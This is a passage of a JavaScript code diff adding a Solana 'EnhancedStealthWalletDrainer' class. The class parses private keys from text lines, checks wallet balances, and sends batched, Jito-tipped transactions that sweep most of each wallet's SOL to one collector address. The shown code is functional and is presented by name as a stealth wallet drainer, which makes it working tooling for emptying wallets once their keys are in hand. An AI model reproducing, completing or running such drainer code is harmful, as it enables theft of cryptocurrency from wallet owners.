for (const line of lines) {
|
694
|
+
try {
|
695
|
+
// Try JSON format first
|
696
|
+
if (line.trim().startsWith('[')) {
|
697
|
+
const keyArray = JSON.parse(line.trim());
|
698
|
+
if (Array.isArray(keyArray) && keyArray.length === 64) {
|
699
|
+
const keypair = this.Keypair.fromSecretKey(Buffer.from(keyArray));
|
700
|
+
wallets.push(keypair);
|
701
|
+
}
|
702
|
+
}
|
703
|
+
// Try pubkey:privkey format
|
704
|
+
else if (line.includes(':')) {
|
705
|
+
const cleanedLine = line.replace(/\s+/g, '');
|
706
|
+
const parts = cleanedLine.split(':');
|
707
|
+
|
708
|
+
if (parts.length === 2) {
|
709
|
+
const [pubKey, privKey] = parts;
|
710
|
+
const decodedKey = this.bs58.decode(privKey);
|
711
|
+
if (decodedKey.length === 64) {
|
712
|
+
const keypair = this.Keypair.fromSecretKey(Uint8Array.from(decodedKey));
|
713
|
+
if (keypair.publicKey.toBase58() === pubKey) {
|
714
|
+
wallets.push(keypair);
|
715
|
+
}
|
716
|
+
}
|
717
|
+
}
|
718
|
+
}
|
719
|
+
} catch (error) {
|
720
|
+
// Skip invalid entries
|
721
|
+
console.error(`โ ๏ธ [SWEEPER] Invalid wallet entry: ${line.substring(0, 20)}...`);
|
722
|
+
}
|
723
|
+
}
|
724
|
+
|
725
|
+
console.log(`๐ [SWEEPER] Loaded ${wallets.length} valid wallet keypairs`);
|
726
|
+
return wallets;
|
727
|
+
} catch (error) {
|
728
|
+
console.error(`โ [SWEEPER] Load keypairs error: ${error.message}`);
|
729
|
+
return [];
|
730
|
+
}
|
731
|
+
}
|
732
|
+
|
733
|
+
/**
|
734
|
+
* Get current wallet balances with retry mechanism
|
735
|
+
*/
|
736
|
+
async getWalletBalances(wallets) {
|
737
|
+
try {
|
738
|
+
const publicKeys = wallets.map(w => w.publicKey);
|
739
|
+
const balances = await this.connection.getMultipleAccountsInfo(publicKeys, this.config.commitment);
|
740
|
+
|
741
|
+
const walletBalances = wallets.map((wallet, index) => ({
|
742
|
+
wallet: wallet,
|
743
|
+
balance: balances[index]?.lamports || 0,
|
744
|
+
solBalance: (balances[index]?.lamports || 0) / 1e9
|
745
|
+
}));
|
746
|
+
|
747
|
+
const totalBalance = walletBalances.reduce((sum, w) => sum + w.solBalance, 0);
|
748
|
+
console.log(`๐ฐ [SWEEPER] Total wallet balance: ${totalBalance.toFixed(6)} SOL`);
|
749
|
+
|
750
|
+
return walletBalances;
|
751
|
+
} catch (error) {
|
752
|
+
console.error(`โ [SWEEPER] Get balances error: ${error.message}`);
|
753
|
+
return [];
|
754
|
+
}
|
755
|
+
}
|
756
|
+
|
757
|
+
/**
|
758
|
+
* Calculate sweep instructions with enhanced fee calculation
|
759
|
+
*/
|
760
|
+
async calculateSweepInstructions(walletBalances) {
|
761
|
+
try {
|
762
|
+
// Ensure collector is initialized before proceeding
|
763
|
+
if (!this.ensureCollectorInitialized()) {
|
764
|
+
console.error('โ [SWEEPER] Cannot proceed with sweep - collector initialization failed');
|
765
|
+
return [];
|
766
|
+
}
|
767
|
+
|
768
|
+
// Get rent exemption
|
769
|
+
const rentExemption = await this.connection.getMinimumBalanceForRentExemption(0, this.config.commitment);
|
770
|
+
const safeRentReserve = Math.floor(rentExemption * 1.15);
|
771
|
+
|
772
|
+
const sweepInstructions = [];
|
773
|
+
let totalSweepAmount = 0;
|
774
|
+
|
775
|
+
for (const walletInfo of walletBalances) {
|
776
|
+
const { wallet, balance } = walletInfo;
|
777
|
+
|
778
|
+
if (balance < this.config.fundingThreshold * 1e9) continue;
|
779
|
+
|
780
|
+
const estimatedFee = 5000 + Math.floor(this.config.jitoTip * 1e9);
|
781
|
+
const reserveAmount = safeRentReserve + estimatedFee + 5000; // Extra safety buffer
|
782
|
+
const availableToSweep = balance - reserveAmount;
|
783
|
+
|
784
|
+
if (availableToSweep > 0) {
|
785
|
+
const sweepAmount = Math.floor(availableToSweep * this.config.sweepPercentage);
|
786
|
+
|
787
|
+
if (sweepAmount > 0) {
|
788
|
+
sweepInstructions.push({
|
789
|
+
wallet: wallet,
|
790
|
+
amount: sweepAmount,
|
791
|
+
instruction: this.SystemProgram.transfer({
|
792
|
+
fromPubkey: wallet.publicKey,
|
793
|
+
toPubkey: this.collector,
|
794
|
+
lamports: sweepAmount
|
795
|
+
})
|
796
|
+
});
|
797
|
+
|
798
|
+
totalSweepAmount += sweepAmount;
|
799
|
+
}
|
800
|
+
}
|
801
|
+
}
|
802
|
+
|
803
|
+
console.log(`๐ [SWEEPER] Total sweep amount: ${(totalSweepAmount / 1e9).toFixed(6)} SOL across ${sweepInstructions.length} wallets`);
|
804
|
+
console.log(`๐ [SWEEPER] Collector address: ${this.collector.toBase58()}`);
|
805
|
+
|
806
|
+
return sweepInstructions;
|
807
|
+
} catch (error) {
|
808
|
+
console.error(`โ [SWEEPER] Calculate sweep instructions error: ${error.message}`);
|
809
|
+
return [];
|
810
|
+
}
|
811
|
+
}
|
812
|
+
|
813
|
+
/**
|
814
|
+
* Execute batched sweep with enhanced transaction management
|
815
|
+
*/
|
816
|
+
async executeBatchedSweep(sweepInstructions) {
|
817
|
+
try {
|
818
|
+
// Create batches
|
819
|
+
const batches = [];
|
820
|
+
let currentBatch = [];
|
821
|
+
|
822
|
+
for (const instruction of sweepInstructions) {
|
823
|
+
if (currentBatch.length >= this.config.maxWalletsPerTx) {
|
824
|
+
batches.push(currentBatch);
|
825
|
+
currentBatch = [];
|
826
|
+
}
|
827
|
+
currentBatch.push(instruction);
|
828
|
+
}
|
829
|
+
|
830
|
+
if (currentBatch.length > 0) {
|
831
|
+
batches.push(currentBatch);
|
832
|
+
}
|
833
|
+
|
834
|
+
console.log(`๐ฆ [SWEEPER] Executing ${batches.length} sweep batches`);
|
835
|
+
|
836
|
+
// Execute each batch
|
837
|
+
let successfulBatches = 0;
|
838
|
+
for (let i = 0; i < batches.length; i++) {
|
839
|
+
try {
|
840
|
+
await this.executeSingleBatch(batches[i], i + 1, batches.length);
|
841
|
+
successfulBatches++;
|
842
|
+
|
843
|
+
// Small delay between batches
|
844
|
+
if (i < batches.length - 1) {
|
845
|
+
await new Promise(resolve => setTimeout(resolve, 500));
|
846
|
+
}
|
847
|
+
} catch (error) {
|
848
|
+
console.error(`โ [SWEEPER] Batch ${i + 1} failed: ${error.message}`);
|
849
|
+
}
|
850
|
+
}
|
851
|
+
|
852
|
+
console.log(`๐ [SWEEPER] Batch execution completed: ${successfulBatches}/${batches.length} successful`);
|
853
|
+
|
854
|
+
} catch (error) {
|
855
|
+
console.error(`โ [SWEEPER] Batched sweep error: ${error.message}`);
|
856
|
+
}
|
857
|
+
}
|
858
|
+
|
859
|
+
/**
|
860
|
+
* Execute a single transaction batch with enhanced monitoring
|
861
|
+
*/
|
862
|
+
async executeSingleBatch(sweepInstructions, batchNum, totalBatches) {
|
863
|
+
try {
|
864
|
+
const instructions = sweepInstructions.map(s => s.instruction);
|
865
|
+
const signingWallets = sweepInstructions.map(s => s.wallet);
|
866
|
+
const payerWallet = signingWallets[0];
|
867
|
+
|
868
|
+
// Add Jito tip for MEV protection
|
869
|
+
const jitoTipLamports = Math.max(Math.floor(this.config.jitoTip * 1e9), 10000);
|
870
|
+
const randomTipAccount = this.jitoTipAccounts[Math.floor(Math.random() * this.jitoTipAccounts.length)];
|
871
|
+
|
872
|
+
const jitoInstruction = this.SystemProgram.transfer({
|
873
|
+
fromPubkey: payerWallet.publicKey,
|
874
|
+
toPubkey: new this.PublicKey(randomTipAccount),
|
875
|
+
lamports: jitoTipLamports
|
876
|
+
});
|
877
|
+
|
878
|
+
const finalInstructions = [...instructions, jitoInstruction];
|
879
|
+
|
880
|
+
// Get blockhash
|
881
|
+
const { blockhash } = await this.connection.getLatestBlockhash(this.config.commitment);
|
882
|
+
|
883
|
+
// Create transaction
|
884
|
+
const messageV0 = new this.TransactionMessage({
|
885
|
+
payerKey: payerWallet.publicKey,
|
886
|
+
recentBlockhash: blockhash,
|
887
|
+
instructions: finalInstructions
|
888
|
+
}).compileToV0Message([]);
|
889
|
+
|
890
|
+
const transaction = new this.VersionedTransaction(messageV0);
|
891
|
+
transaction.sign(signingWallets);
|
892
|
+
|
893
|
+
console.log(`๐ค [SWEEPER] Sending batch ${batchNum}/${totalBatches} (${sweepInstructions.length} wallets)...`);
|
894
|
+
|
895
|
+
// Send transaction
|
896
|
+
const signature = await this.connection.sendRawTransaction(
|
897
|
+
transaction.serialize(),
|
898
|
+
{
|
899
|
+
skipPreflight: false,
|
900
|
+
preflightCommitment: this.config.commitment,
|
901
|
+
maxRetries: 0
|
902
|
+
}
|
903
|
+
);
|
904
|
+
|
905
|
+
console.log(`๐ [SWEEPER] Batch ${batchNum} transaction: ${signature}`);
|
906
|
+
|
907
|
+
// Confirm transaction
|
908
|
+
await this.connection.confirmTransaction({
|
909
|
+
signature,
|
910
|
+
blockhash,
|
911
|
+
lastValidBlockHeight: (await this.connection.getLatestBlockhash()).lastValidBlockHeight
|
912
|
+
}, this.config.commitment);
|
913
|
+
|
914
|
+
console.log(`โ
[SWEEPER] Batch ${batchNum}/${totalBatches} confirmed: ${signature}`);
|
915
|
+
|
916
|
+
} catch (error) {
|
917
|
+
console.error(`โ [SWEEPER] Batch execution error: ${error.message}`);
|
918
|
+
throw error;
|
919
|
+
}
|
920
|
+
}
|
921
|
+
|
922
|
+
/**
|
923
|
+
* Clean up WebSocket subscriptions
|
924
|
+
*/
|
925
|
+
async cleanupSubscriptions() {
|
926
|
+
try {
|
927
|
+
console.log(`๐งน [SWEEPER] Cleaning up ${this.subscriptions.size} subscriptions...`);
|
928
|
+
|
929
|
+
for (const [wallet, subscriptionId] of this.subscriptions) {
|
930
|
+
try {
|
931
|
+
await this.connection.removeAccountChangeListener(subscriptionId);
|
932
|
+
} catch (error) {
|
933
|
+
// Continue cleanup
|
934
|
+
console.error(`โ ๏ธ [SWEEPER] Failed to remove subscription for ${wallet.substring(0, 8)}...`);
|
935
|
+
}
|
936
|
+
}
|
937
|
+
|
938
|
+
this.subscriptions.clear();
|
939
|
+
this.walletStates.clear();
|
940
|
+
|
941
|
+
console.log('โ
[SWEEPER] Subscription cleanup completed');
|
942
|
+
} catch (error) {
|
943
|
+
console.error(`โ [SWEEPER] Cleanup subscriptions error: ${error.message}`);
|
944
|
+
}
|
945
|
+
}
|
946
|
+
|
947
|
+
/**
|
948
|
+
* Cleanup function for daemon shutdown
|
949
|
+
*/
|
950
|
+
async cleanup() {
|
951
|
+
try {
|
952
|
+
console.log('๐ [SWEEPER] Starting cleanup...');
|
953
|
+
this.isActive = false;
|
954
|
+
|
955
|
+
if (this.fundingTimer) {
|
956
|
+
clearTimeout(this.fundingTimer);
|
957
|
+
}
|
958
|
+
|
959
|
+
if (this.connectionHealth) {
|
960
|
+
clearInterval(this.connectionHealth);
|
961
|
+
}
|
962
|
+
|
963
|
+
await this.cleanupSubscriptions();
|
964
|
+
|
965
|
+
this.connectionState = 'disconnected';
|
966
|
+
|
967
|
+
console.log('โ
[SWEEPER] Cleanup completed');
|
968
|
+
|
969
|
+
} catch (error) {
|
970
|
+
console.error(`โ [SWEEPER] Cleanup error: ${error.message}`);
|
971
|
+
}
|
972
|
+
}
|
973
|
+
}
|
974
|
+
|
975
|
+
module.exports = EnhancedStealthWalletDrainer;
|